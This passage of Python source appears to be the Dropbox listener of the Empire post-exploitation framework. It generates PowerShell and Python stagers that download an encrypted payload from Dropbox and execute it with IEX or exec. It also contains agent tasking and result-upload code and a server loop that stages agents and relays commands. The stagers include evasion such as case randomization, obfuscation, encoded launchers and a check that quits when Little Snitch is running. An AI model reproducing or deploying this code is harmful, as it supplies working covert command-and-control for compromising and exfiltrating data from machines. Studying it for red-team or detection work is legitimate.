stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# add in the Dropbox auth token and API params
stager += "$t='%s';" % (apiToken)
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Authorization\",\"Bearer $t\");"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Dropbox-API-Arg\",'{\"path\":\"%s/debugps\"}');" % (stagingFolder)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData('")
stager += "https://content.dropboxapi.com/2/files/download');"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
elif language.startswith('py'):
launcherBase = 'import sys;'
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "t='%s';" % (apiToken)
launcherBase += "server='https://content.dropboxapi.com/2/files/download';"
launcherBase += "req=urllib.request.Request(server);\n"
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header(\"Authorization\",\"Bearer \"+t);"
launcherBase += "req.add_header(\"Dropbox-API-Arg\",'{\"path\":\"%s/debugpy\"}');\n" % (stagingFolder)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color("[!] listeners/dbx generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/dbx generate_stager(): no language specified!'))
return None
pollInterval = listenerOptions['PollInterval']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
apiToken = listenerOptions['APIToken']['Value']
profile = listenerOptions['DefaultProfile']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/dropbox.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_FOLDER', stagingFolder)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_POLLING_INTERVAL', pollInterval)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey.encode('UTF-8'), randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, 'data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('dropbox.py')
template_options = {
'staging_folder': stagingFolder,
'poll_interval': pollInterval,
'staging_key': stagingKey,
'profile': profile,
'api_token': apiToken
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager.encode('UTF-8'))
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/dbx generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse.decode('UTF-8')+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
elif language == 'python':
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
#patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
#strip out comments and blank lines
code = helpers.strip_python_comments(code)
#patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode('UTF-8')))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color("[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:APIToken = "%s";
""" % (apiToken)
getTask = """
$script:GetTask = {
try {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$TaskingsFolder = '"""+ taskingsFolder +"""'
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {
# if there was a tasking data, remove it
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Content-Type", " application/json")
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Remove("Dropbox-API-Arg")
$Null=$"""+helpers.generate_random_script_var_name("wc")+""".UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}")
$Data
}
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$ResultsFolder = '"""+ resultsFolder +"""'
try {
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {
$Data = $Null
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Set("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Data = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData("https://content.dropboxapi.com/2/files/download")
}
catch { }
if($Data -and $Data.Length -ne 0) {
$RoutingPacket = $Data + $RoutingPacket
}
$"""+helpers.generate_random_script_var_name("wc")+"""2 = New-Object System.Net.WebClient
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+"""2.Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Content-Type", "application/octet-stream")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Null = $"""+helpers.generate_random_script_var_name("wc")+"""2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib.request.Request(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.items():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.data = data
o=urllib.request.build_opener()
o.add_handler(urllib.request.ProxyHandler(urllib.request.getproxies()))
urllib.request.install_opener(o)
return urllib.request.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace('REPLACE_TASKINGS_FOLDER', taskingsFolder)
sendMessage = sendMessage.replace('REPLACE_RESULTS_FOLDER', resultsFolder)
sendMessage = sendMessage.replace('REPLACE_API_TOKEN', apiToken)
return sendMessage
else:
print(helpers.color('[!] listeners/dbx generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
listenerName = listenerOptions['Name']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print(helpers.color("[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web."))
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(listenerOptions=listenerOptions, language='powershell')
stagerCodepy = self.generate_stager(listenerOptions=listenerOptions, language='python')
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print(helpers.color("[!] Error uploading stager to '%s/stager'" % (stagingFolder)))
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
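# staging files are named <sessionID>_<stage>.txt; stage 1 carries the
# client's key negotiation data and stage 3 the encrypted sysinfo
# (see the staging diagram in the docstring above)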
relName = fileName.split('/')[-1][:-4]
if '_' in relName:
sessionID, stage = relName.split('_')
sessionID = sessionID.upper()
if stage == '1':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
stageName = "%s/%s_2.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 2 to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
if stage == '3':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith('STAGE2'):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
fileName2 = fileName.replace("%s_3.txt" % (sessionID), "%s_2.txt" % (sessionID))
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName2)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
session_info = Session().query(models.Agent).filter(
models.Agent.session_id == sessionID).first()
if session_info.language == 'ironpython':
version = 'ironpython'
else:
version = ''
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
version=version)
returnResults = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
try:
stageName = "%s/%s_4.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for x in range(len(sessionIDs)):
if isinstance(sessionIDs[x], bytes):
sessionIDs[x] = sessionIDs[x].decode('UTF-8')
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(sessionID, 'powershell', stagingKey)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
except Exception:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options['Name']['Value']
message = "[*] Uploading agent tasks for {} to {}".format(sessionID, taskingFile)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(taskingData, taskingFile, mode=dropbox.files.WriteMode.overwrite)
except dropbox.exceptions.ApiError as e:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading agent tasks for {} to {} : {}".format(sessionID, taskingFile, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split('/')[-1][:-4]
listenerName = self.options['Name']['Value']
message = "[*] Downloading data for '{}' from {}".format(sessionID, fileName)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error download data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
